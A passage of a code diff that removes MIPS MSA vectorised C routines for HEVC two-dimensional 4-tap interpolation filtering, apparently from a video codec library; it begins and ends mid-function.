src10_l, src21_l); - - LD_SB3(src + 16, src_stride, src6, src7, src8); - src += (3 * src_stride); - XORI_B3_128_SB(src6, src7, src8); - ILVR_B2_SB(src7, src6, src8, src7, src76_r, src87_r); - ILVL_B2_SB(src7, src6, src8, src7, src76_l, src87_l); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB2(src, src_stride, src3, src4); - XORI_B2_128_SB(src3, src4); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - ILVL_B2_SB(src3, src2, src4, src3, src32_l, src43_l); - - LD_SB2(src + 16, src_stride, src9, src10); - src += (2 * src_stride); - XORI_B2_128_SB(src9, src10); - ILVR_B2_SB(src9, src8, src10, src9, src98_r, src109_r); - ILVL_B2_SB(src9, src8, src10, src9, src98_l, src109_l); - - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst0_l = const_vec; - DPADD_SB2_SH(src10_l, src32_l, filt0, filt1, dst0_l, dst0_l); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - dst1_l = const_vec; - DPADD_SB2_SH(src21_l, src43_l, filt0, filt1, dst1_l, dst1_l); - dst2_r = const_vec; - DPADD_SB2_SH(src76_r, src98_r, filt0, filt1, dst2_r, dst2_r); - dst2_l = const_vec; - DPADD_SB2_SH(src76_l, src98_l, filt0, filt1, dst2_l, dst2_l); - dst3_r = const_vec; - DPADD_SB2_SH(src87_r, src109_r, filt0, filt1, dst3_r, dst3_r); - dst3_l = const_vec; - DPADD_SB2_SH(src87_l, src109_l, filt0, filt1, dst3_l, dst3_l); - - ST_SH4(dst0_r, dst0_l, dst2_r, dst2_l, dst, 8); - dst += dst_stride; - ST_SH4(dst1_r, dst1_l, dst3_r, dst3_l, dst, 8); - dst += dst_stride; - - LD_SB2(src, src_stride, src5, src2); - XORI_B2_128_SB(src5, src2); - ILVR_B2_SB(src5, src4, src2, src5, src10_r, src21_r); - ILVL_B2_SB(src5, src4, src2, src5, src10_l, src21_l); - - LD_SB2(src + 16, src_stride, src11, src8); - src += (2 * src_stride); - XORI_B2_128_SB(src11, src8); - ILVR_B2_SB(src11, src10, src8, src11, src76_r, src87_r); - ILVL_B2_SB(src11, src10, src8, src11, src76_l, src87_l); - - dst0_r = const_vec; - DPADD_SB2_SH(src32_r, src10_r, filt0, filt1, dst0_r, dst0_r); - dst0_l = const_vec; - DPADD_SB2_SH(src32_l, src10_l, filt0, filt1, dst0_l, dst0_l); - dst1_r = const_vec; - DPADD_SB2_SH(src43_r, src21_r, filt0, filt1, dst1_r, dst1_r); - dst1_l = const_vec; - DPADD_SB2_SH(src43_l, src21_l, filt0, filt1, dst1_l, dst1_l); - dst2_r = const_vec; - DPADD_SB2_SH(src98_r, src76_r, filt0, filt1, dst2_r, dst2_r); - dst2_l = const_vec; - DPADD_SB2_SH(src98_l, src76_l, filt0, filt1, dst2_l, dst2_l); - dst3_r = const_vec; - DPADD_SB2_SH(src109_r, src87_r, filt0, filt1, dst3_r, dst3_r); - dst3_l = const_vec; - DPADD_SB2_SH(src109_l, src87_l, filt0, filt1, dst3_l, dst3_l); - - ST_SH4(dst0_r, dst0_l, dst2_r, dst2_l, dst, 8); - dst += dst_stride; - ST_SH4(dst1_r, dst1_l, dst3_r, dst3_l, dst, 8); - dst += dst_stride; - } -} - -static void hevc_hv_4t_4x2_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y) -{ - v16i8 src0, src1, src2, src3, src4; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - v16i8 mask1; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5; - v8i16 dst20, dst31, dst42, dst10, dst32, dst21, dst43; - v4i32 dst0, dst1; - - src -= (src_stride + 1); - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB5(src, src_stride, src0, src1, src2, src3, src4); - XORI_B5_128_SB(src0, src1, src2, src3, src4); - VSHF_B2_SB(src0, src2, src0, src2, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src3, src1, src3, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src4, src2, src4, mask0, mask1, vec4, vec5); - - dst20 = const_vec; - dst31 = const_vec; - dst42 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst20, dst20); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst31, dst31); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst42, dst42); - ILVRL_H2_SH(dst31, dst20, dst10, dst32); - ILVRL_H2_SH(dst42, dst31, dst21, dst43); - - dst0 = HEVC_FILT_4TAP(dst10, dst32, filt_h0, filt_h1); - dst1 = HEVC_FILT_4TAP(dst21, dst43, filt_h0, filt_h1); - dst0 >>= 6; - dst1 >>= 6; - dst0 = (v4i32) __msa_pckev_h((v8i16) dst1, (v8i16) dst0); - ST_D2(dst0, 0, 1, dst, dst_stride); -} - -static void hevc_hv_4t_4x4_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y) -{ - v16i8 src0, src1, src2, src3, src4, src5, src6; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - v16i8 mask1; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v8i16 filter_vec, const_vec; - v8i16 dst30, dst41, dst52, dst63, dst10, dst32, dst54, dst21, dst43, dst65; - v4i32 dst0, dst1, dst2, dst3; - - src -= (src_stride + 1); - - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - - VSHF_B2_SB(src0, src3, src0, src3, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src4, src1, src4, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src5, src2, src5, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src3, src6, src3, src6, mask0, mask1, vec6, vec7); - - dst30 = const_vec; - dst41 = const_vec; - dst52 = const_vec; - dst63 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst30, dst30); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst41, dst41); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst52, dst52); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst63, dst63); - - ILVRL_H2_SH(dst41, dst30, dst10, dst43); - ILVRL_H2_SH(dst52, dst41, dst21, dst54); - ILVRL_H2_SH(dst63, dst52, dst32, dst65); - - dst0 = HEVC_FILT_4TAP(dst10, dst32, filt_h0, filt_h1); - dst1 = HEVC_FILT_4TAP(dst21, dst43, filt_h0, filt_h1); - dst2 = HEVC_FILT_4TAP(dst32, dst54, filt_h0, filt_h1); - dst3 = HEVC_FILT_4TAP(dst43, dst65, filt_h0, filt_h1); - SRA_4V(dst0, dst1, dst2, dst3, 6); - PCKEV_H2_SW(dst1, dst0, dst3, dst2, dst0, dst2); - ST_D4(dst0, dst2, 0, 1, 0, 1, dst, dst_stride); -} - - -static void hevc_hv_4t_4multx8mult_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6; - v16i8 src7, src8, src9, src10; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - v16i8 mask1; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v8i16 dst10, dst21, dst22, dst73, dst84, dst95, dst106; - v8i16 dst10_r, dst32_r, dst54_r, dst76_r, dst98_r; - v8i16 dst21_r, dst43_r, dst65_r, dst87_r, dst109_r; - v4i32 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst7; - - src -= (src_stride + 1); - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - VSHF_B2_SB(src0, src1, src0, src1, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src2, src1, src2, mask0, mask1, vec2, vec3); - dst10 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst10, dst10); - dst21 = const_vec; - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst21, dst21); - ILVRL_H2_SH(dst21, dst10, dst10_r, dst21_r); - dst22 = (v8i16) __msa_splati_d((v2i64) dst21, 1); - - for (loop_cnt = height >> 3; loop_cnt--;) { - LD_SB8(src, src_stride, - src3, src4, src5, src6, src7, src8, src9, src10); - src += (8 * src_stride); - XORI_B8_128_SB(src3, src4, src5, src6, src7, src8, src9, src10); - - VSHF_B2_SB(src3, src7, src3, src7, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src4, src8, src4, src8, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src5, src9, src5, src9, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src6, src10, src6, src10, mask0, mask1, vec6, vec7); - - dst73 = const_vec; - dst84 = const_vec; - dst95 = const_vec; - dst106 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst73, dst73); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst84, dst84); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst95, dst95); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst106, dst106); - - dst32_r = __msa_ilvr_h(dst73, dst22); - ILVRL_H2_SH(dst84, dst73, dst43_r, dst87_r); - ILVRL_H2_SH(dst95, dst84, dst54_r, dst98_r); - ILVRL_H2_SH(dst106, dst95, dst65_r, dst109_r); - dst22 = (v8i16) __msa_splati_d((v2i64) dst73, 1); - dst76_r = __msa_ilvr_h(dst22, dst106); - - dst0 = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst1 = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst2 = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - dst3 = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - dst4 = HEVC_FILT_4TAP(dst54_r, dst76_r, filt_h0, filt_h1); - dst5 = HEVC_FILT_4TAP(dst65_r, dst87_r, filt_h0, filt_h1); - dst6 = HEVC_FILT_4TAP(dst76_r, dst98_r, filt_h0, filt_h1); - dst7 = HEVC_FILT_4TAP(dst87_r, dst109_r, filt_h0, filt_h1); - SRA_4V(dst0, dst1, dst2, dst3, 6); - SRA_4V(dst4, dst5, dst6, dst7, 6); - PCKEV_H4_SW(dst1, dst0, dst3, dst2, dst5, dst4, dst7, dst6, - dst0, dst1, dst2, dst3); - ST_D8(dst0, dst1, dst2, dst3, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - - dst10_r = dst98_r; - dst21_r = dst109_r; - dst22 = (v8i16) __msa_splati_d((v2i64) dst106, 1); - } -} - -static void hevc_hv_4t_4w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - if (2 == height) { - hevc_hv_4t_4x2_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y); - } else if (4 == height) { - hevc_hv_4t_4x4_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y); - } else if (0 == (height % 8)) { - hevc_hv_4t_4multx8mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height); - } -} - -static void hevc_hv_4t_6w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v8i16 dsth0, dsth1, dsth2, dsth3, dsth4, dsth5, dsth6, dsth7, dsth8, dsth9; - v8i16 dsth10, tmp0, tmp1, tmp2, tmp3, tmp4, tmp5; - v8i16 dst10_r, dst32_r, dst54_r, dst76_r, dst98_r, dst21_r, dst43_r; - v8i16 dst65_r, dst87_r, dst109_r, dst10_l, dst32_l, dst54_l, dst76_l; - v8i16 dst98_l, dst21_l, dst43_l, dst65_l, dst87_l, dst109_l; - v8i16 dst1021_l, dst3243_l, dst5465_l, dst7687_l, dst98109_l; - v4i32 dst0_r, dst1_r, dst2_r, dst3_r, dst4_r, dst5_r, dst6_r, dst7_r; - v4i32 dst0_l, dst1_l, dst2_l, dst3_l; - - src -= (src_stride + 1); - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec4, vec5); - - dsth0 = const_vec; - dsth1 = const_vec; - dsth2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dsth0, dsth0); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dsth1, dsth1); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dsth2, dsth2); - - ILVRL_H2_SH(dsth1, dsth0, dst10_r, dst10_l); - ILVRL_H2_SH(dsth2, dsth1, dst21_r, dst21_l); - - LD_SB8(src, src_stride, src3, src4, src5, src6, src7, src8, src9, src10); - XORI_B8_128_SB(src3, src4, src5, src6, src7, src8, src9, src10); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec6, vec7); - - dsth3 = const_vec; - dsth4 = const_vec; - dsth5 = const_vec; - dsth6 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dsth3, dsth3); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dsth4, dsth4); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dsth5, dsth5); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dsth6, dsth6); - - VSHF_B2_SB(src7, src7, src7, src7, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src8, src8, src8, src8, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src9, src9, src9, src9, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src10, src10, src10, src10, mask0, mask1, vec6, vec7); - - dsth7 = const_vec; - dsth8 = const_vec; - dsth9 = const_vec; - dsth10 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dsth7, dsth7); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dsth8, dsth8); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dsth9, dsth9); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dsth10, dsth10); - - ILVRL_H2_SH(dsth3, dsth2, dst32_r, dst32_l); - ILVRL_H2_SH(dsth4, dsth3, dst43_r, dst43_l); - ILVRL_H2_SH(dsth5, dsth4, dst54_r, dst54_l); - ILVRL_H2_SH(dsth6, dsth5, dst65_r, dst65_l); - ILVRL_H2_SH(dsth7, dsth6, dst76_r, dst76_l); - ILVRL_H2_SH(dsth8, dsth7, dst87_r, dst87_l); - ILVRL_H2_SH(dsth9, dsth8, dst98_r, dst98_l); - ILVRL_H2_SH(dsth10, dsth9, dst109_r, dst109_l); - - PCKEV_D2_SH(dst21_l, dst10_l, dst43_l, dst32_l, dst1021_l, dst3243_l); - PCKEV_D2_SH(dst65_l, dst54_l, dst87_l, dst76_l, dst5465_l, dst7687_l); - dst98109_l = (v8i16) __msa_pckev_d((v2i64) dst109_l, (v2i64) dst98_l); - - dst0_r = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst1_r = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst2_r = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - dst3_r = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - dst4_r = HEVC_FILT_4TAP(dst54_r, dst76_r, filt_h0, filt_h1); - dst5_r = HEVC_FILT_4TAP(dst65_r, dst87_r, filt_h0, filt_h1); - dst6_r = HEVC_FILT_4TAP(dst76_r, dst98_r, filt_h0, filt_h1); - dst7_r = HEVC_FILT_4TAP(dst87_r, dst109_r, filt_h0, filt_h1); - dst0_l = HEVC_FILT_4TAP(dst1021_l, dst3243_l, filt_h0, filt_h1); - dst1_l = HEVC_FILT_4TAP(dst3243_l, dst5465_l, filt_h0, filt_h1); - dst2_l = HEVC_FILT_4TAP(dst5465_l, dst7687_l, filt_h0, filt_h1); - dst3_l = HEVC_FILT_4TAP(dst7687_l, dst98109_l, filt_h0, filt_h1); - SRA_4V(dst0_r, dst1_r, dst2_r, dst3_r, 6); - SRA_4V(dst4_r, dst5_r, dst6_r, dst7_r, 6); - SRA_4V(dst0_l, dst1_l, dst2_l, dst3_l, 6); - PCKEV_H2_SH(dst1_r, dst0_r, dst3_r, dst2_r, tmp0, tmp1); - PCKEV_H2_SH(dst5_r, dst4_r, dst7_r, dst6_r, tmp2, tmp3); - PCKEV_H2_SH(dst1_l, dst0_l, dst3_l, dst2_l, tmp4, tmp5); - ST_D4(tmp0, tmp1, 0, 1, 0, 1, dst, dst_stride); - ST_W4(tmp4, 0, 1, 2, 3, dst + 4, dst_stride); - dst += 4 * dst_stride; - ST_D4(tmp2, tmp3, 0, 1, 0, 1, dst, dst_stride); - ST_W4(tmp5, 0, 1, 2, 3, dst + 4, dst_stride); -} - -static void hevc_hv_4t_8x2_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y) -{ - v16i8 src0, src1, src2, src3, src4; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7, vec8, vec9; - v8i16 dst0, dst1, dst2, dst3, dst4; - v4i32 dst0_r, dst0_l, dst1_r, dst1_l; - v8i16 dst10_r, dst32_r, dst21_r, dst43_r; - v8i16 dst10_l, dst32_l, dst21_l, dst43_l; - - src -= (src_stride + 1); - - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB5(src, src_stride, src0, src1, src2, src3, src4); - XORI_B5_128_SB(src0, src1, src2, src3, src4); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec6, vec7); - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec8, vec9); - - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - dst1 = const_vec; - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst1, dst1); - dst2 = const_vec; - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst2, dst2); - dst3 = const_vec; - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst3, dst3); - dst4 = const_vec; - DPADD_SB2_SH(vec8, vec9, filt0, filt1, dst4, dst4); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst2, dst1, dst21_r, dst21_l); - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst4, dst3, dst43_r, dst43_l); - dst0_r = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst0_l = HEVC_FILT_4TAP(dst10_l, dst32_l, filt_h0, filt_h1); - dst1_r = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst1_l = HEVC_FILT_4TAP(dst21_l, dst43_l, filt_h0, filt_h1); - SRA_4V(dst0_r, dst0_l, dst1_r, dst1_l, 6); - PCKEV_H2_SW(dst0_l, dst0_r, dst1_l, dst1_r, dst0_r, dst1_r); - ST_SW2(dst0_r, dst1_r, dst, dst_stride); -} - -static void hevc_hv_4t_8multx4_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, int32_t width8mult) -{ - int32_t cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, mask0, mask1; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v8i16 filt0, filt1, filt_h0, filt_h1, filter_vec, const_vec; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6; - v8i16 dst10_r, dst32_r, dst54_r, dst21_r, dst43_r, dst65_r; - v8i16 dst10_l, dst32_l, dst54_l, dst21_l, dst43_l, dst65_l; - v4i32 dst0_r, dst0_l, dst1_r, dst1_l, dst2_r, dst2_l, dst3_r, dst3_l; - - src -= (src_stride + 1); - - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask0 = LD_SB(ff_hevc_mask_arr); - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (cnt = width8mult; cnt--;) { - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - src += 8; - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec4, vec5); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst1, dst1); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst2, dst2); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst2, dst1, dst21_r, dst21_l); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec6, vec7); - dst3 = const_vec; - dst4 = const_vec; - dst5 = const_vec; - dst6 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst4, dst4); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst5, dst5); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst6, dst6); - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst4, dst3, dst43_r, dst43_l); - ILVRL_H2_SH(dst5, dst4, dst54_r, dst54_l); - ILVRL_H2_SH(dst6, dst5, dst65_r, dst65_l); - dst0_r = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst0_l = HEVC_FILT_4TAP(dst10_l, dst32_l, filt_h0, filt_h1); - dst1_r = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst1_l = HEVC_FILT_4TAP(dst21_l, dst43_l, filt_h0, filt_h1); - - dst2_r = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - dst2_l = HEVC_FILT_4TAP(dst32_l, dst54_l, filt_h0, filt_h1); - dst3_r = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - dst3_l = HEVC_FILT_4TAP(dst43_l, dst65_l, filt_h0, filt_h1); - SRA_4V(dst0_r, dst0_l, dst1_r, dst1_l, 6); - SRA_4V(dst2_r, dst2_l, dst3_r, dst3_l, 6); - PCKEV_H2_SW(dst0_l, dst0_r, dst1_l, dst1_r, dst0_r, dst1_r); - PCKEV_H2_SW(dst2_l, dst2_r, dst3_l, dst3_r, dst2_r, dst3_r); - - ST_SW4(dst0_r, dst1_r, dst2_r, dst3_r, dst, dst_stride); - dst += 8; - } -} - -static void hevc_hv_4t_8x6_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y) -{ - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7, vec8, vec9; - v16i8 vec10, vec11, vec12, vec13, vec14, vec15, vec16, vec17; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst7, dst8; - v4i32 dst0_r, dst0_l, dst1_r, dst1_l, dst2_r, dst2_l, dst3_r, dst3_l; - v4i32 dst4_r, dst4_l, dst5_r, dst5_l; - v8i16 dst10_r, dst32_r, dst10_l, dst32_l; - v8i16 dst21_r, dst43_r, dst21_l, dst43_l; - v8i16 dst54_r, dst54_l, dst65_r, dst65_l; - v8i16 dst76_r, dst76_l, dst87_r, dst87_l; - - src -= (src_stride + 1); - - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB5(src, src_stride, src0, src1, src2, src3, src4); - src += (5 * src_stride); - LD_SB4(src, src_stride, src5, src6, src7, src8); - - XORI_B5_128_SB(src0, src1, src2, src3, src4); - XORI_B4_128_SB(src5, src6, src7, src8); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec6, vec7); - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec8, vec9); - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec10, vec11); - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec12, vec13); - VSHF_B2_SB(src7, src7, src7, src7, mask0, mask1, vec14, vec15); - VSHF_B2_SB(src8, src8, src8, src8, mask0, mask1, vec16, vec17); - - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - dst1 = const_vec; - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst1, dst1); - dst2 = const_vec; - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst2, dst2); - dst3 = const_vec; - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst3, dst3); - dst4 = const_vec; - DPADD_SB2_SH(vec8, vec9, filt0, filt1, dst4, dst4); - dst5 = const_vec; - DPADD_SB2_SH(vec10, vec11, filt0, filt1, dst5, dst5); - dst6 = const_vec; - DPADD_SB2_SH(vec12, vec13, 